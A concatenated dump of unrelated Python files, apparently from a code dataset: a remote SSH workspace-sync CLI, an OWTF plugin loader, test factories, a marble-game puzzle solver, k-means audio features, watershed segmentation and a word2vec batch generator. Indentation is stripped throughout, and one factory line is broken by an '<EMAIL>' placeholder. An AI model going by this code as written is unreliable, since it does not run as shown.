f(*args, **kwards)
except Exception as e:
if isinstance(e, RemoteError):
click.secho(str(e), fg="yellow")
sys.exit(1)
raise
return wrapper
def validate_connection_string(ctx, param, value):
matcher = CONNECTION_STRING_FORMAT_REGEX.match(value)
if matcher is None:
raise click.BadParameter(
"Please fix value to match the specified format for connection string", ctx=ctx, param=param
)
return value
def int_or_str_label(label: Optional[str]) -> Optional[Union[int, str]]:
"""Try to convert the label to int and return the result, if it's not successful, return the label"""
if label is None:
return None
try:
# Users enter indexes starting with 1 and internally we use indexes starting with 0
return int(label) - 1
except ValueError:
return label
def check_command(command: List[str]):
if command and command[0].startswith("-"):
# Our execution entry points use ignore_unknown_options=True and allow_interspersed_args=False
# to be able to stream the command to the remote machine. However, there is a downside.
# If user runs this command with an unknown option, this option will become a part of the command.
# That's why we need to manually check if the command starts with an unknown option and print an
# error message in this case.
ctx = click.get_current_context()
click.echo(ctx.get_usage())
click.echo(f"Try '{ctx.info_name} -h' for help\n\nError: no such option {command[0]}")
sys.exit(2)
def _add_remote_host(config: WorkspaceConfig, connection: str):
"""Add a new remote host to the workspace config, check the connection, and save it if connection is ok
:param config: the workspace config decription object
:param connection: connection string in format of 'host-name[:remote_dir]'
"""
parts = connection.split(":")
remote_host = parts[0]
config_medium = get_configuration_medium(config)
remote_dir = config_medium.generate_remote_directory(config) if len(parts) == 1 else Path(parts[1])
added, index = config.add_remote_host(remote_host, remote_dir)
if not added:
click.echo(f"{connection} already exists in config")
sys.exit(0)
# Check if we can connect to the remote host and create a directory there
workspace = SyncedWorkspace.from_config(config, config.root, index)
try:
workspace.create_remote()
except RemoteError:
click.secho(f"Failed to create {workspace.remote.directory} on remote host {remote_host}", fg="yellow")
click.secho("Please check if host is accessible via SSH", fg="yellow")
sys.exit(1)
click.echo(f"Created remote directory at {workspace.remote.host}:{workspace.remote.directory}")
click.echo("Remote is configured and ready to use")
# No errors when executing the above code means we can save the config
config_medium.save_config(config)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.argument("connection", metavar="host-name[:remote_dir]", callback=validate_connection_string)
@log_exceptions
def remote_add(connection: str):
"""Add one more host for remote connection to a config file"""
config = load_cwd_workspace_config()
_add_remote_host(config, connection)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.argument("connection", metavar="host-name[:remote_dir]", callback=validate_connection_string)
@log_exceptions
def remote_init(connection: str):
"""Initiate workspace for the remote execution in the current working directory"""
try:
workspace = load_cwd_workspace_config()
if workspace.root == Path.cwd():
click.secho("A configured workspace already exists in the current working directory.", fg="yellow")
else:
click.secho(
f"A configured workspace already initiated in the current working directory's parent {workspace.root}.",
fg="yellow",
)
click.secho("If you want to add a new host to it, please use remote-add.", fg="yellow")
sys.exit(1)
except RemoteError:
# we expect it to fail. It means we don't overwrite an existing workspace
pass
config = WorkspaceConfig.empty(Path.cwd())
_add_remote_host(config, connection)
# help out with .gitignore if we are in a git repository
if not (config.root / ".git").exists():
return
# make sure we don't keep adding to .gitignore
gitignore = config.root / ".gitignore"
if gitignore.exists():
for line in gitignore.read_text().splitlines():
if line.startswith(".remote"):
return
with gitignore.open("a") as f:
f.write("\n")
f.write(".remote*")
f.write("\n")
click.echo("Added '.remote*' to .gitignore")
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option(
"-p", "--push", is_flag=True, help="add IGNORE pattern to push ignore list (mutually exclusive with '--pull')"
)
@click.option(
"-l", "--pull", is_flag=True, help="add IGNORE pattern to pull ignore list (mutually exclusive with '--push')"
)
@click.argument("ignore", nargs=-1, required=True)
@log_exceptions
def remote_ignore(ignore: List[str], push: bool, pull: bool):
"""Add new IGNORE patterns to the ignores list
IGNORE pattern should be a string in rsync-friendly format.
If no options provided these patterns will be ignored on both push and pull
"""
config = load_cwd_workspace_config()
if not push and not pull:
config.ignores.add(ignore)
elif pull and not push:
config.ignores.pull.add(ignore)
elif push and not pull:
config.ignores.push.add(ignore)
else:
raise InvalidInputError("You cannot use both '--pull' and '--push' flags")
config.ignores.trim()
save_config(config)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@log_exceptions
def remote_host():
"""Print the default remote host in use and exit"""
workspace = SyncedWorkspace.from_cwd()
click.echo(workspace.remote.host)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.argument("index", type=int)
@log_exceptions
def remote_set(index: int):
"""Set a new default remote host for the workspace
INDEX is an index of host in config file to use by default (strating from 1)
"""
config = load_cwd_workspace_config()
if len(config.configurations) < index:
click.secho(
f"Index is too big ({index}). Only have {len(config.configurations)} hosts to choose from.", fg="yellow"
)
sys.exit(1)
elif index < 1:
click.secho("Index should be 1 or higher", fg="yellow")
sys.exit(1)
# we use 0-base index internally
index = index - 1
config.default_configuration = index
save_config(config)
click.echo(f"Remote host is set to {config.configurations[index].host}")
@click.command(context_settings=EXECUTION_CONTEXT_SETTINGS)
@click.option("-n", "--dry-run", is_flag=True, help="do a dry run of the whole cycle")
@click.option("-m", "--mirror", is_flag=True, help="mirror local files on the remote host")
@click.option("-v", "--verbose", is_flag=True, help="increase verbosity")
@click.option("-e", is_flag=True, help="(deprecated) kept for backward compatibility, noop")
@click.option(
"-t",
"--tunnel",
"port_args",
type=str,
help="Enable local port forwarding. Pass value as <remote port>:<local port>. \
If local port is not passed, the local port value would be set to <remote port> value by default",
)
@click.option(
"-s",
"--stream-changes",
default=False,
is_flag=True,
help="Resync local changes if any while the command is being run remotely",
)
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.option("--multi", is_flag=True, help="sync and run the remote commands on each remote host from config")
@click.option(
"--log",
type=click.Path(file_okay=False, resolve_path=True),
help="Write sync and remote command output to the log file instead of stdout. "
"Log file will be located inside DIRECTORY/<timestamp>/<host>_output.log",
)
@click.argument("command", nargs=-1, required=True)
@log_exceptions
def remote(
command: List[str],
dry_run: bool,
mirror: bool,
verbose: bool,
e: bool,
port_args: Optional[str],
label: Optional[str],
stream_changes: bool,
log: Optional[str],
multi: bool,
):
"""Sync local workspace files to remote machine, execute the COMMAND and sync files back regardless of the result"""
check_command(command)
if verbose:
logging.basicConfig(level=logging.INFO, format=BASE_LOGGING_FORMAT)
ports = ForwardingOptions.from_string(port_args) if port_args else None
if multi and label:
raise InvalidInputError("--multi and --label options cannot be used together")
workspaces = SyncedWorkspace.from_cwd_mass() if multi else [SyncedWorkspace.from_cwd(int_or_str_label(label))]
with ThreadPoolExecutor(max_workers=len(workspaces)) as executor:
futures = {}
descriptors = []
start_timestamp = datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
for workspace in workspaces:
host = workspace.remote.host
if multi or log:
# We save logs into the <log_dir>/<timestamp>/<hostname>_output.log
log_dir = Path(log) if log else (workspace.local_root / "logs")
log_dir = log_dir / start_timestamp
log_dir.mkdir(parents=True, exist_ok=True)
try:
# If the logs are enabled and they are inside the workspace root, we need to exclude them from
# syncing
relative_path = log_dir.relative_to(workspace.local_root)
workspace.ignores.add([f"{relative_path}/*_output.log"])
except ValueError:
# Value error means that logs are placed outside of the workspace root
pass
fd = (log_dir / f"{host}_output.log").open("w")
descriptors.append(fd)
workspace.communication = CommunicationOptions(stdin=None, stdout=fd, stderr=fd)
future = executor.submit(
workspace.execute_in_synced_env,
command,
dry_run=dry_run,
verbose=verbose,
mirror=mirror,
ports=ports,
stream_changes=stream_changes,
)
futures[future] = workspace
final_exit_code = 0
for future in as_completed(list(futures.keys())):
workspace = futures[future]
try:
exit_code = future.result(timeout=0)
if exit_code != 0:
click.secho(f"Remote command on {workspace.remote.host} exited with {exit_code}", fg="yellow")
final_exit_code = exit_code
except Exception as e: # noqa: F841
class_name = e.__class__.__name__
click.secho(f"{class_name}: {e}", fg="yellow")
final_exit_code = 255
for fd in descriptors:
fd.close()
sys.exit(final_exit_code)
@click.command(context_settings=EXECUTION_CONTEXT_SETTINGS)
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.argument("command", nargs=-1, required=True)
@log_exceptions
def remote_quick(command: List[str], label: Optional[str]):
"""Execute the COMMAND remotely"""
check_command(command)
workspace = SyncedWorkspace.from_cwd(int_or_str_label(label))
code = workspace.execute(command, raise_on_error=False)
sys.exit(code)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option("-n", "--dry-run", is_flag=True, help="do a dry run of a pull")
@click.option("-v", "--verbose", is_flag=True, help="increase verbosity")
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.argument("path", nargs=-1)
@log_exceptions
def remote_pull(dry_run: bool, verbose: bool, path: List[str], label: Optional[str]):
"""Bring in files from the default remote directory to local workspace.
Optionally bring in PATH instead of the whole workspace.
PATH is a path of file or directory to bring back relative to the remote workspace root.
All sync exclude rules will be omitted if PATH is provided.
"""
if verbose:
logging.basicConfig(level=logging.INFO, format=BASE_LOGGING_FORMAT)
workspace = SyncedWorkspace.from_cwd(int_or_str_label(label))
if not path:
workspace.pull(info=True, verbose=verbose, dry_run=dry_run)
return
for subpath in path:
workspace.pull(info=True, verbose=verbose, dry_run=dry_run, subpath=Path(subpath))
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option("-n", "--dry-run", is_flag=True, help="do a dry run of a push")
@click.option("-m", "--mirror", is_flag=True, help="mirror local files on the remote host")
@click.option("-v", "--verbose", is_flag=True, help="increase verbosity")
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.option(
"--multi", is_flag=True, help="push files to all available remote workspaces instead of pushing to the default one"
)
@log_exceptions
def remote_push(dry_run: bool, mirror: bool, verbose: bool, multi: bool, label: Optional[str]):
"""Push local workspace files to the remote directory"""
if verbose:
logging.basicConfig(level=logging.INFO, format=BASE_LOGGING_FORMAT)
if multi and label:
raise InvalidInputError("--multi and --label options cannot be used together")
workspaces = SyncedWorkspace.from_cwd_mass() if multi else [SyncedWorkspace.from_cwd(int_or_str_label(label))]
for workspace in workspaces:
workspace.push(info=True, verbose=verbose, dry_run=dry_run, mirror=mirror)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@log_exceptions
def remote_delete(label: Optional[str]):
"""Delete the remote directory"""
workspace = SyncedWorkspace.from_cwd(int_or_str_label(label))
workspace.clear_remote()
click.echo(f"Successfully deleted {workspace.remote.directory} on host {workspace.remote.host}")
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.option("-d", "--deep", is_flag=True, help="check latency and download/upload speed if connection is ok")
@log_exceptions
def remote_explain(label: Optional[str], deep: bool):
"""Print out various debug information to debug the workspace"""
logging.basicConfig(level=logging.INFO, format=BASE_LOGGING_FORMAT)
workspace = SyncedWorkspace.from_cwd(int_or_str_label(label))
explain(workspace, deep)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@log_exceptions
def mremote():
click.secho("mremote is deprecated. Please use 'remote --multi' instead.", fg="yellow")
sys.exit(1)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@log_exceptions
def mremote_push():
click.secho("mremote-push is deprecated. Please use 'remote-push --multi' instead.", fg="yellow")
sys.exit(1)
| StarcoderdataPython |
76235 | <reponame>Udbhavbisarya23/owtf<gh_stars>1000+
"""
owtf.managers.plugin
~~~~~~~~~~~~~~~~~~~~
This module manages the plugins and their dependencies
"""
import imp
import json
import os
from owtf.models.plugin import Plugin
from owtf.models.test_group import TestGroup
from owtf.settings import PLUGINS_DIR
from owtf.utils.error import abort_framework
from owtf.utils.file import FileOperations
TEST_GROUPS = ["web", "network", "auxiliary"]
def get_test_groups_config(file_path):
"""Reads the test groups from a config file
.. note::
This needs to be a list instead of a dictionary to preserve order in python < 2.7
:param file_path: The path to the config file
:type file_path: `str`
:return: List of test groups
:rtype: `list`
"""
test_groups = []
config_file = FileOperations.open(file_path, "r").read().splitlines()
for line in config_file:
if "#" == line[0]:
continue # Skip comments
try:
code, priority, descrip, hint, url = line.strip().split(" | ")
except ValueError:
abort_framework(
"Problem in Test Groups file: '{!s}' -> Cannot parse line: {!s}".format(
file_path, line
)
)
if len(descrip) < 2:
descrip = hint
if len(hint) < 2:
hint = ""
test_groups.append(
{
"code": code,
"priority": priority,
"descrip": descrip,
"hint": hint,
"url": url,
}
)
return test_groups
def load_test_groups(session, file_default, file_fallback, plugin_group):
"""Load test groups into the DB.
:param test_groups_file: The path to the test groups config
:type test_groups_file: `str`
:param plugin_group: Plugin group to load
:type plugin_group: `str`
:return: None
:rtype: None
"""
file_path = file_default
if not os.path.isfile(file_default):
file_path = file_fallback
test_groups = get_test_groups_config(file_path)
for group in test_groups:
session.merge(
TestGroup(
code=group["code"],
priority=group["priority"],
descrip=group["descrip"],
hint=group["hint"],
url=group["url"],
group=plugin_group,
)
)
session.commit()
def load_plugins(session):
"""Loads the plugins from the filesystem and updates their info.
.. note::
Walks through each sub-directory of `PLUGINS_DIR`.
For each file, loads it thanks to the imp module.
Updates the database with the information for each plugin:
+ 'title': the title of the plugin
+ 'name': the name of the plugin
+ 'code': the internal code of the plugin
+ 'group': the group of the plugin (ex: web)
+ 'type': the type of the plugin (ex: active, passive, ...)
+ 'descrip': the description of the plugin
+ 'file': the filename of the plugin
+ 'internet_res': does the plugin use internet resources?
:return: None
:rtype: None
"""
# TODO: When the -t, -e or -o is given to OWTF command line, only load
# the specific plugins (and not all of them like below).
# Retrieve the list of the plugins (sorted) from the directory given by
# 'PLUGIN_DIR'.
plugins = []
for root, _, files in os.walk(PLUGINS_DIR):
plugins.extend(
[
os.path.join(root, filename)
for filename in files
if filename.endswith("py")
]
)
plugins = sorted(plugins)
# Retrieve the information of the plugin.
for plugin_path in plugins:
# Only keep the relative path to the plugin
plugin = plugin_path.replace(PLUGINS_DIR, "")
# TODO: Using os.path.sep might not be portable especially on
# Windows platform since it allows '/' and '\' in the path.
# Retrieve the group, the type and the file of the plugin.
# Ensure all empty strings are removed from the list
chunks = list(filter(None, plugin.split(os.path.sep)))
# TODO: Ensure that the variables group, type and file exist when
# the length of chunks is less than 3.
if len(chunks) == 3:
group, type, file = chunks
# Retrieve the internal name and code of the plugin.
name, code = os.path.splitext(file)[0].split("@")
# Only load the plugin if in XXX_TEST_GROUPS configuration (e.g. web_testgroups.cfg)
if session.query(TestGroup).get(code) is None:
continue
# Load the plugin as a module.
filename, pathname, desc = imp.find_module(
os.path.splitext(os.path.basename(plugin_path))[0],
[os.path.dirname(plugin_path)],
)
plugin_module = imp.load_module(
os.path.splitext(file)[0], filename, pathname, desc
)
# Try te retrieve the `attr` dictionary from the module and convert
# it to json in order to save it into the database.
attr = None
try:
attr = json.dumps(plugin_module.ATTR)
except AttributeError: # The plugin didn't define an attr dict.
pass
# Save the plugin into the database.
session.merge(
Plugin(
key="{!s}@{!s}".format(type, code),
group=group,
type=type,
title=name.title().replace("_", " "),
name=name,
code=code,
file=file,
descrip=plugin_module.DESCRIPTION,
attr=attr,
)
)
session.commit()
def get_types_for_plugin_group(session, plugin_group):
"""Get available plugin types for a plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of available plugin types
:rtype: `list`
"""
plugin_types = session.query(Plugin.type).filter_by(
group=plugin_group
).distinct().all()
plugin_types = [i[0] for i in plugin_types]
return plugin_types
def plugin_gen_query(session, criteria):
"""Generate a SQLAlchemy query based on the filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return:
:rtype:
"""
query = session.query(Plugin).join(TestGroup)
if criteria.get("type", None):
if isinstance(criteria["type"], str):
query = query.filter(Plugin.type == criteria["type"])
if isinstance(criteria["type"], list):
query = query.filter(Plugin.type.in_(criteria["type"]))
if criteria.get("group", None):
if isinstance(criteria["group"], str):
query = query.filter(Plugin.group == criteria["group"])
if isinstance(criteria["group"], list):
query = query.filter(Plugin.group.in_(criteria["group"]))
if criteria.get("code", None):
if isinstance(criteria["code"], str):
query = query.filter(Plugin.code == criteria["code"])
if isinstance(criteria["code"], list):
query = query.filter(Plugin.code.in_(criteria["code"]))
if criteria.get("name", None):
if isinstance(criteria["name"], str):
query = query.filter(Plugin.name == criteria["name"])
if isinstance(criteria["name"], list):
query = query.filter(Plugin.name.in_(criteria["name"]))
return query.order_by(TestGroup.priority.desc())
def get_all_plugin_dicts(session, criteria=None):
"""Get plugin dicts based on filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return: List of plugin dicts
:rtype: `list`
"""
if criteria is None:
criteria = {}
if "code" in criteria:
criteria["code"] = Plugin.name_to_code(session, criteria["code"])
query = plugin_gen_query(session, criteria)
plugin_obj_list = query.all()
plugin_dicts = []
for obj in plugin_obj_list:
plugin_dicts.append(obj.to_dict())
return plugin_dicts
def get_plugins_by_type(session, plugin_type):
"""Get plugins based on type argument
:param plugin_type: Plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type})
def get_plugins_by_group(session, plugin_group):
"""Get plugins by plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"group": plugin_group})
def get_plugins_by_group_type(session, plugin_group, plugin_type):
"""Get plugins by group and plugin type
:param plugin_group: Plugin group
:type plugin_group: `str`
:param plugin_type: plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type, "group": plugin_group})
| StarcoderdataPython |
1602226 | <gh_stars>1-10
import factory
from .. import db
from ..model.bookmark import Bookmark, Tag, Link
from ..model.user import User
class SQLAlchemyGetOrCreateOptions(factory.alchemy.SQLAlchemyOptions):
def _build_default_options(self):
return super(SQLAlchemyGetOrCreateOptions, self)._build_default_options() + [
factory.base.OptionDefault("sqlalchemy_get_or_create", (), inherit=True)
]
class SQLAlchemyGetOrCreateModelFactory(factory.alchemy.SQLAlchemyModelFactory):
_options_class = SQLAlchemyGetOrCreateOptions
@classmethod
def _get_or_create(cls, model_class, *args, **kwargs):
session = cls._meta.sqlalchemy_session
if session is None:
raise RuntimeError("No session provided.")
filters = {}
for field in cls._meta.sqlalchemy_get_or_create:
if field not in kwargs:
# TODO: should be factory.errors.FactoryError
raise RuntimeError(
"Unable to find initialization value for '%s' in factory %s"
% (field, cls.___name__)
)
filters[field] = kwargs[field]
with session.no_autoflush:
return session.query(model_class).filter_by(**filters).one_or_none()
@classmethod
def _create(cls, model_class, *args, **kwargs):
if cls._meta.sqlalchemy_get_or_create:
obj = cls._get_or_create(model_class, *args, **kwargs)
if obj is not None:
return obj
return super(SQLAlchemyGetOrCreateModelFactory, cls)._create(model_class, *args, **kwargs)
# https://factoryboy.readthedocs.io/en/latest/reference.html#inheritance According to the
# documentation the sequence counter *won't* be shared across children classes since they do not
# share the same model as their parent class.
class BaseModelFactory(SQLAlchemyGetOrCreateModelFactory):
class Meta:
sqlalchemy_session = db.Session
class UserFactory(BaseModelFactory):
class Meta:
model = User
username = factory.Sequence(lambda n: "{}{}".format(factory.Faker("user_name"), n))
email = factory.LazyAttribute(lambda obj: <EMAIL>".<EMAIL>(obj))
display_name = factory.Faker("name")
password = factory.Faker("password")
active = True
admin = False
class TagFactory(BaseModelFactory):
class Meta:
model = Tag
sqlalchemy_get_or_create = ("name",)
name = factory.Sequence(lambda n: "{}{}".format(factory.Faker("word"), n))
class LinkFactory(BaseModelFactory):
class Meta:
model = Link
href = factory.Sequence(lambda n: "{}?foo={}".format(factory.Faker("uri"), n))
class BookmarkFactory(BaseModelFactory):
class Meta:
model = Bookmark
title = factory.Faker("sentence", nb_words=6)
notes = factory.Faker("text")
private = False
# tags = factory.SubFactory(TagFactory)
# href = factory.SubFactory(LinkFactory)
# user = factory.SubFactory(UserFactory)
@factory.post_generation
def user(self, create, extracted, **kwargs):
if not create:
return
if extracted:
self.user = extracted
@factory.post_generation
def tags(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for tag in extracted:
self.tags.append(tag)
@factory.post_generation
def link(self, create, extracted, **kwargs):
if not create:
return
if extracted:
self.link = extracted
else:
# let's provide a default for the link
self.link = LinkFactory.create()
| StarcoderdataPython |
171456 | from collections import defaultdict, deque
from datetime import datetime
def find_high_score(player_num, last_marble_value):
"""
>>> find_high_score(7, 25)
32
>>> find_high_score(10, 1618)
8317
>>> find_high_score(13, 7999)
146373
>>> find_high_score(17, 1104)
2764
>>> find_high_score(21, 6111)
54718
>>> find_high_score(30, 5807)
37305
>>> find_high_score(470, 72170)
388024
:param player_num: The number of players in this game.
:param last_marble_value: The value of the last marble played before the game ended.
:return: The high score for that game.
"""
player_scores = defaultdict(int)
marble_locations = deque()
marble_locations.append(0)
current_marble_value = 1
player_id = 1
while current_marble_value <= last_marble_value:
if current_marble_value % 23 == 0:
player_scores[player_id] += current_marble_value
marble_locations.rotate(7)
marble_to_remove = marble_locations.pop()
player_scores[player_id] += marble_to_remove
marble_locations.rotate(-1)
else:
marble_locations.rotate(-1)
marble_locations.append(current_marble_value)
current_marble_value += 1
player_id += 1
if player_id > player_num:
player_id = 1
high_score = 0
for player in player_scores.keys():
if player_scores[player] > high_score:
high_score = player_scores[player]
return high_score
if __name__ == "__main__":
start_time = datetime.now()
print(f"Part 1 high score: {find_high_score(470, 72170)} Runtime {datetime.now() - start_time}")
start_time = datetime.now()
print(f"Part 2 high score: {find_high_score(470, 7217000)} Runtime {datetime.now() - start_time}")
| StarcoderdataPython |
156152 |
# coding: utf-8
# In[7]:
import numpy as np
from sklearn import cluster
from scipy.cluster.vq import whiten
k = 50
kextra = 10
num_recs = 645
seed = 2
segment_file = open('bird_data/supplemental_data/segment_features.txt',
'r')
##clean
line = segment_file.readline()
line = segment_file.readline()
index = 0
while line != '':
tokens = line.split(',')
nums = map(float, tokens)
nums = nums[2:len(line)] # Omit recid and segid
if index == 0:
segfeatures = nums
else:
segfeatures = np.vstack((segfeatures, nums))
line = segment_file.readline()
index += 1
#Before running k-means, it is beneficial to rescale each feature dimension of the observation set with whitening.
#Each feature is divided by its standard deviation across all observations to give it unit variance.
#From documentation in scikit-learn
segfeatures = whiten(segfeatures)
# In[8]:
segfeatures
# In[14]:
kmeans1 = cluster.KMeans(n_clusters=k, init='k-means++', n_init=k,
max_iter=300, random_state=seed)
kmeans2 = cluster.KMeans(n_clusters=kextra, init='k-means++', n_init=k,
max_iter=300, random_state=seed)
clusters1 = kmeans1.fit_predict(segfeatures)
clusters2 = kmeans2.fit_predict(segfeatures)
segment_file = open('bird_data/supplemental_data/segment_features.txt',
'r')
segment_file.seek(0)
line = segment_file.readline()
line = segment_file.readline()
index = 0
prev_rec_id = -1
hist = np.zeros((num_recs, k + kextra))
while line != '':
while 1:
tokens = line.split(',')
rec_id = int(tokens[0])
if rec_id != prev_rec_id:
prev_rec_id = rec_id
break
hist[rec_id][clusters1[index]] += 1
hist[rec_id][k + clusters2[index]] += 1
line = segment_file.readline()
if line == '':
break
index += 1
segment_file.close()
histfilename = 'hist.txt'
histfile = open(histfilename, 'w')
histfile.write('rec_id,[hist]\n')
for rec_id in range(num_recs):
histfile.write('%d,' % rec_id)
for col in range(k + kextra - 1):
histfile.write('%f,' % hist[rec_id][col])
histfile.write('%f\n' % hist[rec_id][col + 1])
histfile.close()
# In[ ]:
| StarcoderdataPython |
3355363 | import cv2
import os
import glob
import argparse
import numpy as np
from matplotlib import pyplot as plt
from scipy import ndimage as ndi
from skimage.segmentation import watershed
from skimage.feature import peak_local_max
def segment(img, mask):
mask = cv2.bitwise_not(mask)
img_masked = cv2.bitwise_and(img, img, mask=mask)
img_out = cv2.subtract(img, img_masked)
return img_out
def water_shed(img, threshold=50):
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
ret, img_thres = cv2.threshold(img, threshold, 255, cv2.THRESH_BINARY|cv2.THRESH_OTSU)
distance = ndi.distance_transform_edt(img_thres)
local_maxi = peak_local_max(distance, min_distance=30, indices=False, labels=img_thres)
markers = ndi.label(local_maxi, structure=np.ones((3, 3)))[0]
labels = watershed(-distance, markers, mask=img_thres)
return labels
def dis_watershed(img, thres_distance=5, threshold=50):
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
ret, img_thres = cv2.threshold(gray, threshold, 255, cv2.THRESH_BINARY|cv2.THRESH_OTSU)
distance = ndi.distance_transform_edt(img_thres)
local_maxi = peak_local_max(distance, min_distance=30, indices=False, labels=img_thres)
peak_list = list()
for r in range(local_maxi.shape[0]):
for c in range(local_maxi.shape[1]):
if local_maxi[r][c] != False:
peak_list.append((r, c))
final_peak = list()
for r, c in peak_list:
tag = True
for peak in final_peak:
if abs(peak[0]-r)+abs(peak[1]-c) <= thres_distance:
tag = False
local_maxi[r][c] = False
break
if tag:
final_peak.append((r, c))
markers = ndi.label(local_maxi, structure=np.ones((3, 3)))[0]
labels = watershed(-distance, markers, mask=img_thres)
return labels
if __name__ == "__main__":
parse = argparse.ArgumentParser()
parse.add_argument('-d', '--dataset', type=str, required=True, help='Input image dataset')
parse.add_argument('-f', '--footprint_shape', type=int, required=False, help='Footprint shape of WaterShed', default=9)
parse.add_argument('-t', '--threshold', type=int, required=False, help='WaterShed threshold', default=50)
args = parse.parse_args()
# load the prediction image
image_list = glob.glob(os.path.join(args.dataset, '*_rgb_res.png'))
threshold = args.threshold
shape = (args.footprint_shape, args.footprint_shape)
# start to watershed the image
for image in image_list:
image_name = image.replace('_rgb_res.png', '')
print('Processing', image_name, end='\t')
img_res = cv2.imread(image_name+'_rgb_res.png', 0)
img_original = cv2.imread(image_name+'_rgb.png')
img_original = cv2.cvtColor(img_original, cv2.COLOR_BGR2RGB)
img_plant = segment(img_original, img_res)
# two way of segment
# label = water_shed(img_plant)
label = dis_watershed(img_plant)
# save the label image
plt.imsave(image_name+'_ws.png', label, cmap='gray', format='png')
print('Done!')
| StarcoderdataPython |
3331702 | """Sub-module with utilities to make experiments easier to write."""
from embiggen.utils.abstract_models import (
AbstractClassifierModel,
AbstractEmbeddingModel,
EmbeddingResult,
AbstractModel,
get_models_dataframe,
get_available_models_for_node_label_prediction,
get_available_models_for_edge_prediction,
get_available_models_for_edge_label_prediction,
get_available_models_for_node_embedding,
abstract_class,
format_list
)
from embiggen.utils.pipeline import classification_evaluation_pipeline
from embiggen.utils.number_to_ordinal import number_to_ordinal
__all__ = [
"AbstractClassifierModel",
"AbstractEmbeddingModel",
"EmbeddingResult",
"AbstractModel",
"classification_evaluation_pipeline",
"build_init",
"format_list",
"get_models_dataframe",
"get_available_models_for_node_label_prediction",
"get_available_models_for_edge_prediction",
"get_available_models_for_edge_label_prediction",
"get_available_models_for_node_embedding",
"abstract_class",
"number_to_ordinal",
"format_list"
]
| StarcoderdataPython |
3308804 | # Copyright 2020 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module starts SDC with only default stage libs like basic and runs pipelines for tests.
import logging
import pytest
from streamsets.testframework.markers import sdc_activation, sdc_min_version
from .utils.utils_activation import ACTIVATION_SUPPORT_SDC_MIN_VERSION, register_and_activate_sdc
# Skip all tests in this module if --sdc-version < 3.15.0
pytestmark = sdc_min_version(ACTIVATION_SUPPORT_SDC_MIN_VERSION)
logger = logging.getLogger(__name__)
@sdc_activation
@pytest.mark.parametrize('activate_sdc', [False, True])
def test_with_basic_stage_loaded(sdc_executor, activate_sdc, jms):
"""SDC is loaded only with default basic stages.
The pipelines with basic lib stages should be able to run when SDC is not activated. activate_sdc = False
The pipelines with basic lib stages should be able to run when SDC is activated. activate_sdc = true
"""
if activate_sdc:
register_and_activate_sdc(sdc_executor)
_test_basic_stage(sdc_executor)
def _test_basic_stage(sdc_executor):
pipeline_builder = sdc_executor.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.data_format = 'JSON'
dev_raw_data_source.raw_data = '{"emp_id" :"123456"}'
dev_raw_data_source.stop_after_first_batch = True
wiretap = pipeline_builder.add_wiretap()
dev_raw_data_source >> wiretap.destination
pipeline = pipeline_builder.build()
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
assert len(wiretap.output_records) == 1
assert wiretap.output_records[0].field['emp_id'].value == '123456'
| StarcoderdataPython |
1751932 | from __future__ import print_function
import collections
import math
import numpy as np
import random
import tensorflow as tf
from six.moves import range
from assignment5_word2vec.dataset import vocabulary_size, loadDataset
data, count, dictionary, reverse_dictionary = loadDataset()
class BatchGenerator():
def __init__(self, array, windowSize, rndSeed=21344):
self.array = array
self.N = len(array)
self.windowSize = windowSize
# indexes of elements in array that have at least windowSize elements to each size
self.sampledIndexes = np.arange(windowSize, self.N - windowSize)
np.random.seed(rndSeed)
self.iter = 0
def __call__(self, batchSize):
#indexes = np.random.choice(self.sampledIndexes, batchSize, replace=False)
indexes = np.empty(batchSize, dtype='int64')
for i in range(batchSize):
indexes[i] = self.sampledIndexes[self.iter]
self.iter = (self.iter + 1) % len(self.sampledIndexes)
windows = np.empty(batchSize*self.windowSize*2, dtype='int64')
wi = 0
# write filling of the array more efficiently, with numpy
for i in indexes:
for j in range(1, self.windowSize+1):
windows[wi] = self.array[i+j]; wi += 1
windows[wi] = self.array[i-j]; wi += 1
centers = np.empty((batchSize, 1), dtype='int64')
for i in range(batchSize): centers[i,0] = self.array[indexes[i]]
return centers, windows
def test_batch():
bg = BatchGenerator(data, 1)
ind, win = bg(3)
